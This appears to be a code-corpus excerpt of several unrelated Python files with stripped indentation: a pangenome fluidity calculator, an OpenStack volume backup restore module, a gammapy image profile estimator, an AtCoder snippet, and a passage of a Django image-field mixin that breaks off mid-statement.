help = 'Orthogroups file, see format in READ.me',
metavar=''
)
parser.add_argument(
'-o',
'--out',
required = True,
help = 'Output folder',
metavar=''
)
parser.add_argument(
'-c',
'--cpus',
type=int,
default=1,
help = 'Number of cores to use for multiprocessing [default: 1]',
metavar=''
)
parser.add_argument(
'-max_sub',
'--max_subsamples',
type=int,
default=250000,
help = 'Max number of subsamples to run on N genomes sampled. [default: 250000]',
metavar=''
)
parser.add_argument(
'--max_off',
action='store_true',
help = 'Turn off the max subsamples. This will cause the script sample ALL possible combinations'\
'for N genomes',
)
parser.add_argument(
'-p',
'--prefix',
help = 'Prefix to append to the result files (such as Genus, species, etc.)',
metavar=''
)
args=parser.parse_args()
if not os.path.isdir(args.out):
os.makedirs(os.path.join(args.out))
result_dir = os.path.abspath(os.path.join(rundir, args.out))
if args.input:
input_file = os.path.abspath(args.input)
else:
print('ERROR: No orthogroups file was provided please provide on, -i or --input')
sys.exit()
if args.prefix:
fluid_results = os.path.abspath(os.path.join(result_dir, args.prefix+'_fluidity.txt'))
fluid_fig = os.path.abspath(os.path.join(result_dir, args.prefix+'_fluidity.png'))
else:
fluid_results = os.path.abspath(os.path.join(result_dir, 'Pangenome_fluidity.txt'))
fluid_fig = os.path.abspath(os.path.join(result_dir, 'Pangenome_fluidity.png'))
def create_ortho_dictionary(ortho_file): # create dictionary of gene clusters and isolates per cluster
'''Genereate dictionary of Orthogroups.'''
print('Creating ortholog dictionary')
ortho_isolates_dict = OrderedDict() # {Protein Cluster : list of isolates represented in cluster}
with open(ortho_file, 'r') as infile:
ortho_list = [item.strip() for item in sorted(infile)]
for line in ortho_list:
iso_list = []
if ':' in line:
cluster, genes = line.split(':')
elif '\t' in line:
cluster, genes = line.split('\t', 1)
else:
cluster, genes = line.split(' ', 1)
for match in re.finditer(r'([^\s]+)', genes):
isolate = match.group(0).split('_')[0]
iso_list.append(isolate)
ortho_isolates_dict[cluster] = list(set(iso_list))
return ortho_isolates_dict
def create_pair_dictionary(ortho_dictionary):
'''Create all possible unique pairs of isolates and get their unique
sum gene clusters.'''
print('Creating dictionary of paired ratio values')
pair_dict = {} # {(Isolate1, Isolate2) : [ratio of sum(unique clusters)/sum(all clusters)]}
for i in range(0, len(iso_list)):
for x in range(0, len(iso_list)):
if not iso_list[i] == iso_list[x]:
pair = tuple(sorted([iso_list[i], iso_list[x]]))
if not pair in pair_dict.keys():
cogs = {'Shared' : 0, 'Uk' : 0, 'Ul' : 0}
for k,v in ortho_dictionary.items():
if pair[0] in v and pair[1] in v:
cogs['Shared'] += 1
elif pair[0] in v and pair[1] not in v:
cogs['Uk'] += 1
elif pair[0] not in v and pair[1] in v:
cogs['Ul'] += 1
else:
pass # don't need to count a cluster if both isolates are not present
unique_pair = cogs['Uk'] + cogs['Ul']
all_pair = (cogs['Uk'] + cogs['Shared']) + (cogs['Ul'] + cogs['Shared'])
pair_dict[pair] = unique_pair/all_pair
return pair_dict
def compute_fluidity_all_genomes():
'''
Computes the fluidity and variance for the pangenome in question from the max number
of genomes in the pangenome.
'''
N = iso_num
fluidity_list = [ratio for ratio in pair_dict.values()] # list of ratios
pangenome_fluidity = (2/(N*(N-1)))*sum(fluidity_list) # get fluidity from average of all ratios
jack_samples = list(combinations(iso_list, N - 1)) # get list of all combos of N-1 from max num of genomes
fluidity_i_list = []
for sample in jack_samples:
jack_pairs = tuple(combinations(sample,2)) # get all pairs from current jackknife sample
jack_sample_fluidity = [pair_dict[tuple(sorted(p))] for p in jack_pairs] # get ratios from pair_dict
fluidity_i = (2/((N-1)*(N-2)))*sum(jack_sample_fluidity) # calculate fluidity_i
fluidity_i_list.append(fluidity_i)
fluidity_i_mean = np.mean(fluidity_i_list) # calculate fluidity_i_mean from all fluidity_i's
fluidity_variance = ((N-1)/N)*sum([(i-fluidity_i_mean)**2 for i in fluidity_i_list]) # calculate variance
return pangenome_fluidity, fluidity_variance
def subsample_multiprocess(combo_list):
'''
Takes portions of the full combo_list and runs them on separate threads for faster processing.
Calcualtes fluidity for each sample and returns list of fluidities.
'''
N = len(combo_list[0]) # get N from number of genomes present
sample_process_list = []
for sample in combo_list:
pairs = tuple(combinations(sample,2))
pair_fluidity_list = [pair_dict[tuple(sorted(p))] for p in pairs]
sample_fluidity = (2/(N*(N-1)))*sum(pair_fluidity_list)
sample_process_list.append(sample_fluidity)
return sample_process_list
def genome_subsamples_fluidities(perm_list):
'''
Compute fluidities from all possible combinations of genomes from 3 to N randomly sampled genomes
(N is the max number of gneomes in sample, so only sampled once). Has a cut off of max subsamples
at which point variances are calcualted as sample variances (n-1) instead of full population
variances.
'''
sub_fluid_dict = {} # {N genomes sampled : [list of fluidities from subsamples]}
for N in range(3, iso_num + 1):
sub_fluid_dict[N] = []
N_combos = list(combinations(iso_list, N))
if args.max_off:
combos = N_combos
else:
if len(N_combos) > args.max_subsamples:
combos = random.choices(N_combos, k=args.max_subsamples)
perm_list.append(N)
else:
combos = N_combos
print('Performing fluidity calculations on {} subsample combinations of {} genomes'.format(len(combos),N))
if not len(N_combos) == 1:
chunk = round(len(combos)/args.cpus)
split_combos = [combos[i:i + chunk] for i in range(0, len(combos), chunk)]
pool = Pool(processes=args.cpus)
results = pool.imap(subsample_multiprocess, split_combos)
pool.close()
pool.join()
sub_fluid_dict[N].append(results)
else:
last_run = subsample_multiprocess(N_combos)
sub_fluid_dict[N].append(last_run)
sub_fluid_dict[N]=list(flatten(sub_fluid_dict[N]))
print(len(sub_fluid_dict[N]))
return sub_fluid_dict
def flatten(lis):
for item in lis:
if isinstance(item, Iterable) and not isinstance(item, str):
for x in flatten(item):
yield x
else:
yield item
def exponential(x, a, b, c):
return a * np.exp(b * x) + c
def neg_exponential(x, a, b, c):
return a * np.exp(-b * x) + c
def sumOfSquaredError(parameterTuple, x_values, y_curve_values, func):
warnings.filterwarnings("ignore") # do not print warnings by genetic algorithm
val = func(x_values, *parameterTuple)
return np.sum((y_curve_values - val) ** 2.0)
def generate_Initial_Parameters(x_values, y_curve_values, func):
# min and max used for bounds
maxX = max(x_values)
minX = min(x_values)
maxY = max(y_curve_values)
minY = min(y_curve_values)
maxXY = max(maxX, maxY)
parameterBounds = []
parameterBounds.append([-maxXY, maxXY]) # seach bounds for a
parameterBounds.append([-maxXY, maxXY]) # seach bounds for b
parameterBounds.append([-maxXY, maxXY]) # seach bounds for c
# "seed" the numpy random number generator for repeatable results
result = differential_evolution(sumOfSquaredError, parameterBounds, args=(x_values,y_curve_values, func), seed=3)
return result.x
def create_fluidity_results(figure_output, results_output):
total_variance = []
for i in range(3, iso_num + 1):
if i in permutation_list:
total_variance.append(np.var(sub_fluid_dict[i], ddof = 1) + pan_variance)
else:
total_variance.append(np.var(sub_fluid_dict[i]) + pan_variance)
total_variance = np.array(total_variance)
total_stderr = np.array([x**(1/2) for x in total_variance])
y_fluidity_values = np.array([pan_fluidity for i in range(3, iso_num + 1)])
x_labels = np.array([i for i in range(3, iso_num + 1)])
stderr_bottom = np.array([(pan_fluidity - v) for v in total_stderr])
stderr_top = np.array([(pan_fluidity + v) for v in total_stderr])
fig, ax = plt.subplots()
try: # Still had problems sometimes with fitting curves, this solution works best for now
geneticParameters_top = generate_Initial_Parameters(x_labels, stderr_top, exponential)
geneticParameters_bottom = generate_Initial_Parameters(x_labels, stderr_bottom, exponential)
popt_t, pcov = curve_fit(exponential, x_labels, stderr_top, geneticParameters_top, maxfev=10000)
popt_b, pcov = curve_fit(exponential, x_labels, stderr_bottom, geneticParameters_bottom, maxfev=10000)
if len(set(exponential(x_labels, *popt_t))) > 3 and len(set(exponential(x_labels, *popt_b))) > 3:
plt.fill_between(x_labels, exponential(x_labels, *popt_t), exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6)
top_curve = exponential(x_labels, *popt_t)
bottom_curve = exponential(x_labels, *popt_b)
if len(set(exponential(x_labels, *popt_t))) <= 3:
geneticParameters_top = generate_Initial_Parameters(x_labels, stderr_top, neg_exponential)
popt_t, pcov = curve_fit(neg_exponential, x_labels, stderr_top, geneticParameters_top, maxfev=10000)
plt.fill_between(x_labels, neg_exponential(x_labels, *popt_t), exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6)
top_curve = neg_exponential(x_labels, *popt_t)
bottom_curve = exponential(x_labels, *popt_b)
else:
pass
if len(set(exponential(x_labels, *popt_b))) <= 3:
geneticParameters_bottom = generate_Initial_Parameters(x_labels, stderr_bottom, neg_exponential)
popt_b, pcov = curve_fit(neg_exponential, x_labels, stderr_bottom, geneticParameters_bottom, maxfev=10000)
plt.fill_between(x_labels, exponential(x_labels, *popt_t), neg_exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6)
top_curve = exponential(x_labels, *popt_t)
bottom_curve = neg_exponential(x_labels, *popt_b)
else:
pass
except:
pass
ax.set_axisbelow(True)
plt.minorticks_on()
plt.grid(which='minor', axis='y', color='white', linestyle='--', alpha=0.3)
ax.yaxis.grid(True, linestyle='-', linewidth='1', which='major', color='white')
ax.xaxis.grid(True, linestyle='-', linewidth='1', which='major', color='white', alpha=0.5)
ax.tick_params(axis='x', which='minor', bottom=False)
ax.set_facecolor('gainsboro')
plt.plot(x_labels, y_fluidity_values, ls='--', lw=1, color='black') # plot y-values of fluidity
plt.xticks(np.arange(x_labels[0], x_labels[len(x_labels)-1]+1, 1.0)) # make sure x interval is 1
plt.xlim(x_labels[0], x_labels[len(x_labels)-1]) # adjust x limit so it starts with 3 at 0
max_y = max(stderr_top)
min_y = min(stderr_bottom)
plt.ylim((min_y - min_y*0.15), (max_y + max_y*0.15))
plt.xlabel('Number of genomes sampled')
plt.ylabel('Fluidity, '+u'\u03C6')
plt.tight_layout()
plt.savefig(figure_output)
with open(results_output, 'w') as results: # print out fluidity results
results.write('Genomes_Sampled\tFluidity\tTotal_Variance\tTotal_Stderr\tExponential_top\tExponential_bottom\n')
r_out = []
for i in range(0, iso_num-2):
r_out.append([str(i+3), str(pan_fluidity), str(total_variance[i]), str(total_stderr[i]),
str(top_curve[i]), str(bottom_curve[i])])
for line in r_out:
results.write('\t'.join(line) + '\n')
if __name__ == "__main__":
ortho_dict = create_ortho_dictionary(input_file)
iso_num = max([len(v) for v in ortho_dict.values()])
iso_list = list(set(itertools.chain.from_iterable([v for v in ortho_dict.values() if len(v) == iso_num])))
pair_dict = create_pair_dictionary(ortho_dict)
pan_results = compute_fluidity_all_genomes()
pan_fluidity = pan_results[0]
pan_variance = pan_results[1]
permutation_list = []
sub_fluid_dict = genome_subsamples_fluidities(permutation_list)
create_fluidity_results(fluid_fig, fluid_results)
| 2.671875 | 3 |
osvolbackup/backup.py | CCSGroupInternational/osvolbackup | 1 | 5514 | #
# This module provides the Instance class that encapsulate some complex server instances related operations
#
from __future__ import print_function
from json import loads
from neutronclient.v2_0 import client as neutron_client
from novaclient import client as nova_client
from cinderclient import client as cinder_client
from osvolbackup.server import ServerInstance, ServerNotFound
from osvolbackup.osauth import get_session, VERSION
from osvolbackup.verbose import vprint
from time import time, sleep
class BackupGroup(object):
max_secs_gbi = 300
poll_delay = 10
def __init__(self, serverName):
self.selected_metadata = None
self.selected_backups = []
self.selected_volumes = []
session = self.session = get_session()
self.neutron = neutron_client.Client(session=session)
self.nova = nova_client.Client(VERSION, session=session)
self.cinder = cinder_client.Client(VERSION, session=session)
try:
server = ServerInstance(serverName)
except ServerNotFound:
name = 'osvb_'+serverName
else:
name = 'osvb_'+server.instance.id
self.backup_list = self.cinder.backups.list(search_opts={"name": name})
self.volume_map = {}
if len(self.backup_list) == 0:
raise BackupNotFound(serverName)
# Load metadata from the backup description field
self.backup_meta_data = backup_meta_data = {}
for backup in self.backup_list:
meta_data = loads(backup.description)
backup_meta_data[backup.id] = meta_data
self.volume_map[backup.id] = {"id": backup.volume_id, "size": backup.size}
self.available_backups = sorted(set([b['backup_time'] for b in backup_meta_data.values()]))
def select_by_tag(self, tag):
if tag == 'last':
selected_backup_timestamp = self.available_backups[-1]
else:
raise BackupTooMany(tag)
# Get volumes associated with the selected backup
for backup_id, backup_meta in self.backup_meta_data.iteritems():
if backup_meta['backup_time'] == selected_backup_timestamp:
self.selected_backups.append(backup_id)
self.selected_volumes.append(self.volume_map[backup_id])
self.selected_metadata = backup_meta
def get_volumes(self):
return self.selected_volumes
def restore(self, server=None, network=None, to_project=None, skip_vm=False):
# flavor = self.nova.flavors.find(name=self.selected_metadata['flavor'])
new_volume_list = self._create_volumes(self.selected_volumes, to_project)
# Restore the volumes
block_device_mapping = {}
for i, backup_id in enumerate(self.selected_backups):
vol_index = self.backup_meta_data[backup_id]['vol_index']
new_volume_id = new_volume_list[i].id
vprint("Restoring from backup", backup_id, "to volume", new_volume_id)
dev_name = "vd" + chr(ord('a') + vol_index)
block_device_mapping[dev_name] = new_volume_id
restore = self.cinder.restores.restore(backup_id=backup_id, volume_id=new_volume_id)
restored_volume = self.cinder.volumes.get(restore.volume_id)
self._wait_for(restored_volume, ('restoring-backup',), 'available')
# We need to get again to refresh the metadata
restored_volume = self.cinder.volumes.get(restore.volume_id)
if vol_index == 0:
if not skip_vm:
name = restored_volume.metadata['osvb_name']
flavor = restored_volume.metadata['osvb_flavor']
flavor = self.nova.flavors.find(name=flavor) # name to id
saved_networks = loads(restored_volume.metadata['osvb_network'])
if not skip_vm:
nics = []
if network is not None:
net_name, net_ip = network.split("=")
net_id = self.neutron.list_networks(name=net_name)['networks'][0]['id']
nic_info = {'net-id': net_id, 'v4-fixed-ip': net_ip}
nics.append(nic_info)
else:
for network_name, network_ips in saved_networks.iteritems():
nic_info = {}
nic_info['net-id'] = self.neutron.list_networks(name=network_name)['networks'][0]['id']
nic_info['v4-fixed-ip'] = network_ips[0]
nics.append(nic_info)
target_session = get_session(to_project)
target_nova = nova_client.Client(VERSION, session=target_session)
server = target_nova.servers.create(
name=name, image=None, flavor=flavor, block_device_mapping=block_device_mapping, nics=nics
)
print("Server was restored into instance", server.id)
def _create_volumes(self, volume_list, to_project):
""" Create volumes based """
vprint("Creating volumes for the instance restore")
target_session = get_session(to_project)
target_cinder = cinder_client.Client(VERSION, session=target_session)
vol_list = []
for volume in volume_list:
vprint("Creating %dG volume" % volume['size'])
new_volume = target_cinder.volumes.create(volume['size'])
self._wait_for(new_volume, ('creating',), 'available')
vol_list.append(new_volume)
return vol_list
# Borrowed from https://github.com/Akrog/cinderback/blob/master/cinderback.py
def _wait_for(self, resource, allowed_states, expected_states=None, timeout=None):
"""Waits for a resource to come to a specific state.
:param resource: Resource we want to wait for
:param allowed_states: iterator with allowed intermediary states
:param expected_states: states we expect to have at the end, if None
is supplied then anything is good.
:param need_up: If wee need backup service to be up and running
:return: The most updated resource
"""
if timeout:
deadline = time() + timeout
else:
deadline = time() + (self.max_secs_gbi * resource.size)
while resource.status in allowed_states:
sleep(self.poll_delay)
if deadline <= time():
raise TimeoutError(what=resource)
resource = resource.manager.get(resource.id)
if expected_states and resource.status not in expected_states:
raise UnexpectedStatus(what=resource, intermediate=allowed_states, final=expected_states)
return resource
class BackupException(Exception):
def __init__(self, what, *args, **kwargs):
super(BackupException, self).__init__(*args, **kwargs)
self.what = what
def __str__(self):
return u'%s: %s' % (self.__class__.__name__, self.what)
class UnexpectedStatus(BackupException):
def __init__(self, what, intermediate='', final='', *args, **kwargs):
super(UnexpectedStatus, self).__init__(what, *args, **kwargs)
self.intermediate = intermediate
self.final = final
def __str__(self):
if self.intermediate or self.final:
steps = (' [intermediate: %s, final: %s]' % (self.intermediate, self.final))
else:
steps = ''
return (u'%s: Status is %s%s' %
(self.__class__.__name__, self.what.status, steps))
class BackupNotFound(BackupException):
pass
class BackupTooMany(BackupException):
pass
| 2.25 | 2 |
gammapy/estimators/profile.py | JohannesBuchner/gammapy | 1 | 5515 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Tools to create profiles (i.e. 1D "slices" from 2D images)."""
import numpy as np
import scipy.ndimage
from astropy import units as u
from astropy.convolution import Box1DKernel, Gaussian1DKernel
from astropy.coordinates import Angle
from astropy.table import Table
from .core import Estimator
__all__ = ["ImageProfile", "ImageProfileEstimator"]
# TODO: implement measuring profile along arbitrary directions
# TODO: think better about error handling. e.g. MC based methods
class ImageProfileEstimator(Estimator):
"""Estimate profile from image.
Parameters
----------
x_edges : `~astropy.coordinates.Angle`
Coordinate edges to define a custom measument grid (optional).
method : ['sum', 'mean']
Compute sum or mean within profile bins.
axis : ['lon', 'lat', 'radial']
Along which axis to estimate the profile.
center : `~astropy.coordinates.SkyCoord`
Center coordinate for the radial profile option.
Examples
--------
This example shows how to compute a counts profile for the Fermi galactic
center region::
import matplotlib.pyplot as plt
from gammapy.maps import ImageProfileEstimator
from gammapy.maps import Map
from astropy import units as u
# load example data
filename = '$GAMMAPY_DATA/fermi-3fhl-gc/fermi-3fhl-gc-counts.fits.gz'
fermi_cts = Map.read(filename)
# set up profile estimator and run
p = ImageProfileEstimator(axis='lon', method='sum')
profile = p.run(fermi_cts)
# smooth profile and plot
smoothed = profile.smooth(kernel='gauss')
smoothed.peek()
plt.show()
"""
tag = "ImageProfileEstimator"
def __init__(self, x_edges=None, method="sum", axis="lon", center=None):
self._x_edges = x_edges
if method not in ["sum", "mean"]:
raise ValueError("Not a valid method, choose either 'sum' or 'mean'")
if axis not in ["lon", "lat", "radial"]:
raise ValueError("Not a valid axis, choose either 'lon' or 'lat'")
if method == "radial" and center is None:
raise ValueError("Please provide center coordinate for radial profiles")
self.parameters = {"method": method, "axis": axis, "center": center}
def _get_x_edges(self, image):
if self._x_edges is not None:
return self._x_edges
p = self.parameters
coordinates = image.geom.get_coord(mode="edges").skycoord
if p["axis"] == "lat":
x_edges = coordinates[:, 0].data.lat
elif p["axis"] == "lon":
lon = coordinates[0, :].data.lon
x_edges = lon.wrap_at("180d")
elif p["axis"] == "radial":
rad_step = image.geom.pixel_scales.mean()
corners = [0, 0, -1, -1], [0, -1, 0, -1]
rad_max = coordinates[corners].separation(p["center"]).max()
x_edges = Angle(np.arange(0, rad_max.deg, rad_step.deg), unit="deg")
return x_edges
def _estimate_profile(self, image, image_err, mask):
p = self.parameters
labels = self._label_image(image, mask)
profile_err = None
index = np.arange(1, len(self._get_x_edges(image)))
if p["method"] == "sum":
profile = scipy.ndimage.sum(image.data, labels.data, index)
if image.unit.is_equivalent("counts"):
profile_err = np.sqrt(profile)
elif image_err:
# gaussian error propagation
err_sum = scipy.ndimage.sum(image_err.data ** 2, labels.data, index)
profile_err = np.sqrt(err_sum)
elif p["method"] == "mean":
# gaussian error propagation
profile = scipy.ndimage.mean(image.data, labels.data, index)
if image_err:
N = scipy.ndimage.sum(~np.isnan(image_err.data), labels.data, index)
err_sum = scipy.ndimage.sum(image_err.data ** 2, labels.data, index)
profile_err = np.sqrt(err_sum) / N
return profile, profile_err
def _label_image(self, image, mask=None):
p = self.parameters
coordinates = image.geom.get_coord().skycoord
x_edges = self._get_x_edges(image)
if p["axis"] == "lon":
lon = coordinates.data.lon.wrap_at("180d")
data = np.digitize(lon.degree, x_edges.deg)
elif p["axis"] == "lat":
lat = coordinates.data.lat
data = np.digitize(lat.degree, x_edges.deg)
elif p["axis"] == "radial":
separation = coordinates.separation(p["center"])
data = np.digitize(separation.degree, x_edges.deg)
if mask is not None:
# assign masked values to background
data[mask.data] = 0
return image.copy(data=data)
def run(self, image, image_err=None, mask=None):
"""Run image profile estimator.
Parameters
----------
image : `~gammapy.maps.Map`
Input image to run profile estimator on.
image_err : `~gammapy.maps.Map`
Input error image to run profile estimator on.
mask : `~gammapy.maps.Map`
Optional mask to exclude regions from the measurement.
Returns
-------
profile : `ImageProfile`
Result image profile object.
"""
p = self.parameters
if image.unit.is_equivalent("count"):
image_err = image.copy(data=np.sqrt(image.data))
profile, profile_err = self._estimate_profile(image, image_err, mask)
result = Table()
x_edges = self._get_x_edges(image)
result["x_min"] = x_edges[:-1]
result["x_max"] = x_edges[1:]
result["x_ref"] = (x_edges[:-1] + x_edges[1:]) / 2
result["profile"] = profile * image.unit
if profile_err is not None:
result["profile_err"] = profile_err * image.unit
result.meta["PROFILE_TYPE"] = p["axis"]
return ImageProfile(result)
class ImageProfile:
"""Image profile class.
The image profile data is stored in `~astropy.table.Table` object, with the
following columns:
* `x_ref` Coordinate bin center (required).
* `x_min` Coordinate bin minimum (optional).
* `x_max` Coordinate bin maximum (optional).
* `profile` Image profile data (required).
* `profile_err` Image profile data error (optional).
Parameters
----------
table : `~astropy.table.Table`
Table instance with the columns specified as above.
"""
def __init__(self, table):
self.table = table
def smooth(self, kernel="box", radius="0.1 deg", **kwargs):
r"""Smooth profile with error propagation.
Smoothing is described by a convolution:
.. math::
x_j = \sum_i x_{(j - i)} h_i
Where :math:`h_i` are the coefficients of the convolution kernel.
The corresponding error on :math:`x_j` is then estimated using Gaussian
error propagation, neglecting correlations between the individual
:math:`x_{(j - i)}`:
.. math::
\Delta x_j = \sqrt{\sum_i \Delta x^{2}_{(j - i)} h^{2}_i}
Parameters
----------
kernel : {'gauss', 'box'}
Kernel shape
radius : `~astropy.units.Quantity`, str or float
Smoothing width given as quantity or float. If a float is given it
is interpreted as smoothing width in pixels. If an (angular) quantity
is given it is converted to pixels using `xref[1] - x_ref[0]`.
kwargs : dict
Keyword arguments passed to `~scipy.ndimage.uniform_filter`
('box') and `~scipy.ndimage.gaussian_filter` ('gauss').
Returns
-------
profile : `ImageProfile`
Smoothed image profile.
"""
table = self.table.copy()
profile = table["profile"]
radius = u.Quantity(radius)
radius = np.abs(radius / np.diff(self.x_ref))[0]
width = 2 * radius.value + 1
if kernel == "box":
smoothed = scipy.ndimage.uniform_filter(
profile.astype("float"), width, **kwargs
)
# renormalize data
if table["profile"].unit.is_equivalent("count"):
smoothed *= int(width)
smoothed_err = np.sqrt(smoothed)
elif "profile_err" in table.colnames:
profile_err = table["profile_err"]
# use gaussian error propagation
box = Box1DKernel(width)
err_sum = scipy.ndimage.convolve(profile_err ** 2, box.array ** 2)
smoothed_err = np.sqrt(err_sum)
elif kernel == "gauss":
smoothed = scipy.ndimage.gaussian_filter(
profile.astype("float"), width, **kwargs
)
# use gaussian error propagation
if "profile_err" in table.colnames:
profile_err = table["profile_err"]
gauss = Gaussian1DKernel(width)
err_sum = scipy.ndimage.convolve(profile_err ** 2, gauss.array ** 2)
smoothed_err = np.sqrt(err_sum)
else:
raise ValueError("Not valid kernel choose either 'box' or 'gauss'")
table["profile"] = smoothed * self.table["profile"].unit
if "profile_err" in table.colnames:
table["profile_err"] = smoothed_err * self.table["profile"].unit
return self.__class__(table)
def plot(self, ax=None, **kwargs):
"""Plot image profile.
Parameters
----------
ax : `~matplotlib.axes.Axes`
Axes object
**kwargs : dict
Keyword arguments passed to `~matplotlib.axes.Axes.plot`
Returns
-------
ax : `~matplotlib.axes.Axes`
Axes object
"""
import matplotlib.pyplot as plt
if ax is None:
ax = plt.gca()
y = self.table["profile"].data
x = self.x_ref.value
ax.plot(x, y, **kwargs)
ax.set_xlabel("lon")
ax.set_ylabel("profile")
ax.set_xlim(x.max(), x.min())
return ax
def plot_err(self, ax=None, **kwargs):
"""Plot image profile error as band.
Parameters
----------
ax : `~matplotlib.axes.Axes`
Axes object
**kwargs : dict
Keyword arguments passed to plt.fill_between()
Returns
-------
ax : `~matplotlib.axes.Axes`
Axes object
"""
import matplotlib.pyplot as plt
if ax is None:
ax = plt.gca()
y = self.table["profile"].data
ymin = y - self.table["profile_err"].data
ymax = y + self.table["profile_err"].data
x = self.x_ref.value
# plotting defaults
kwargs.setdefault("alpha", 0.5)
ax.fill_between(x, ymin, ymax, **kwargs)
ax.set_xlabel("x (deg)")
ax.set_ylabel("profile")
return ax
@property
def x_ref(self):
"""Reference x coordinates."""
return self.table["x_ref"].quantity
@property
def x_min(self):
"""Min. x coordinates."""
return self.table["x_min"].quantity
@property
def x_max(self):
"""Max. x coordinates."""
return self.table["x_max"].quantity
@property
def profile(self):
"""Image profile quantity."""
return self.table["profile"].quantity
@property
def profile_err(self):
"""Image profile error quantity."""
try:
return self.table["profile_err"].quantity
except KeyError:
return None
def peek(self, figsize=(8, 4.5), **kwargs):
"""Show image profile and error.
Parameters
----------
**kwargs : dict
Keyword arguments passed to `ImageProfile.plot_profile()`
Returns
-------
ax : `~matplotlib.axes.Axes`
Axes object
"""
import matplotlib.pyplot as plt
fig = plt.figure(figsize=figsize)
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax = self.plot(ax, **kwargs)
if "profile_err" in self.table.colnames:
ax = self.plot_err(ax, color=kwargs.get("c"))
return ax
def normalize(self, mode="peak"):
"""Normalize profile to peak value or integral.
Parameters
----------
mode : ['integral', 'peak']
Normalize image profile so that it integrates to unity ('integral')
or the maximum value corresponds to one ('peak').
Returns
-------
profile : `ImageProfile`
Normalized image profile.
"""
table = self.table.copy()
profile = self.table["profile"]
if mode == "peak":
norm = np.nanmax(profile)
elif mode == "integral":
norm = np.nansum(profile)
else:
raise ValueError(f"Invalid normalization mode: {mode!r}")
table["profile"] /= norm
if "profile_err" in table.colnames:
table["profile_err"] /= norm
return self.__class__(table)
| 2.578125 | 3 |
ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | 2 | 5516 | <reponame>KATO-Hiro/AtCoder
# -*- coding: utf-8 -*-
def main():
a = input()
# See:
# https://www.slideshare.net/chokudai/abc007
if a == 'a':
print('-1')
else:
print('a')
if __name__ == '__main__':
main()
| 3.65625 | 4 |
env/lib/python3.8/site-packages/versatileimagefield/mixins.py | crimergio/linux_test | 1 | 5517 | """versatileimagefield Field mixins."""
import os
import re
from .datastructures import FilterLibrary
from .registry import autodiscover, versatileimagefield_registry
from .settings import (
cache,
VERSATILEIMAGEFIELD_CREATE_ON_DEMAND,
VERSATILEIMAGEFIELD_SIZED_DIRNAME,
VERSATILEIMAGEFIELD_FILTERED_DIRNAME
)
from .validators import validate_ppoi
autodiscover()
filter_regex_snippet = r'__({registered_filters})__'.format(
registered_filters='|'.join([
key
for key, filter_cls in versatileimagefield_registry._filter_registry.items()
])
)
sizer_regex_snippet = r'-({registered_sizers})-(\d+)x(\d+)(?:-\d+)?'.format(
registered_sizers='|'.join([
sizer_cls.get_filename_key_regex()
for key, sizer_cls in versatileimagefield_registry._sizedimage_registry.items()
])
)
filter_regex = re.compile(filter_regex_snippet + '$')
sizer_regex = re.compile(sizer_regex_snippet + '$')
filter_and_sizer_regex = re.compile(
filter_regex_snippet + sizer_regex_snippet + '$'
)
class VersatileImageMixIn(object):
"""A mix-in that provides the filtering/sizing API."""
def __init__(self, *args, **kwargs):
"""Construct PPOI and create_on_demand."""
self._create_on_demand = VERSATILEIMAGEFIELD_CREATE_ON_DEMAND
super(VersatileImageMixIn, self).__init__(*args, **kwargs)
# Setting initial ppoi
if self.field.ppoi_field:
instance_ppoi_value = getattr(
self.instance,
self.field.ppoi_field,
(0.5, 0.5)
)
self.ppoi = instance_ppoi_value
else:
self.ppoi = (0.5, 0.5)
@property
def url(self):
"""
Return the appropriate URL.
URL is constructed based on these field conditions:
* If empty (not `self.name`) and a placeholder is defined, the
URL to the placeholder is returned.
* Otherwise, defaults to vanilla ImageFieldFile behavior.
"""
if not self.name and self.field.placeholder_image_name:
return self.storage.url(self.field.placeholder_image_name)
return super(VersatileImageMixIn, self).url
@property
def create_on_demand(self):
"""create_on_demand getter."""
return self._create_on_demand
@create_on_demand.setter
def create_on_demand(self, value):
if not isinstance(value, bool):
raise ValueError(
"`create_on_demand` must be a boolean"
)
else:
self._create_on_demand = value
self.build_filters_and_sizers(self.ppoi, value)
@property
def ppoi(self):
"""Primary Point of Interest (ppoi) getter."""
return self._ppoi_value
@ppoi.setter
def ppoi(self, value):
"""Primary Point of Interest (ppoi) setter."""
ppoi = validate_ppoi(
value,
return_converted_tuple=True
)
if ppoi is not False:
self._ppoi_value = ppoi
self.build_filters_and_sizers(ppoi, self.create_on_demand)
def build_filters_and_sizers(self, ppoi_value, create_on_demand):
"""Build the filters and sizers for a field."""
name = self.name
if not name and self.field.placeholder_image_name:
name = self.field.placeholder_image_name
self.filters = FilterLibrary(
name,
self.storage,
versatileimagefield_registry,
ppoi_value,
create_on_demand
)
for (
attr_name,
sizedimage_cls
) in versatileimagefield_registry._sizedimage_registry.items():
setattr(
self,
attr_name,
sizedimage_cls(
path_to_image=name,
storage=self.storage,
create_on_demand=create_on_demand,
ppoi=ppoi_value
)
)
def get_filtered_root_folder(self):
"""Return the location where filtered images are stored."""
folder, filename = os.path.split(self.name)
return os.path.join(folder, VERSATILEIMAGEFIELD_FILTERED_DIRNAME, '')
def get_sized_root_folder(self):
"""Return the location where sized images are stored."""
folder, filename = os.path.split(self.name)
return os.path.join(VERSATILEIMAGEFIELD_SIZED_DIRNAME, folder, '')
def get_filtered_sized_root_folder(self):
"""Return the location where filtered + sized images are stored."""
sized_root_folder = self.get_sized_root_folder()
return os.path.join(
sized_root_folder,
VERSATILEIMAGEFIELD_FILTERED_DIRNAME
)
def delete_matching_files_from_storage(self, root_folder, regex):
"""
Delete files in `root_folder` which match `regex` before file ext.
Example values:
* root_folder = 'foo/'
* self.name = 'bar.jpg'
* regex = re.compile('-baz')
Result:
* foo/bar-baz.jpg <- Deleted
* foo/bar-biz.jpg <- Not deleted
"""
if not self.name: # pragma: no cover
return
try:
directory_list, file_list = self.storage.listdir(root_folder)
except OSError: # pragma: no cover
pass
else:
folder, filename = os.path.split(self.name)
basename, ext = os.path.splitext(filename)
for f in file_list:
if not f.startswith(basename) or not f.endswith(ext): # pragma: no cover
continue
tag = f[len(basename):-len(ext)]
assert f == basename + tag + ext
if regex.match(tag) is not None:
file_location = os.path.join(root_folder, f)
self.storage.delete(file_location)
cache.delete(
self.storage.url(file_location)
)
print(
"Deleted {file} (created from: {original})".format(
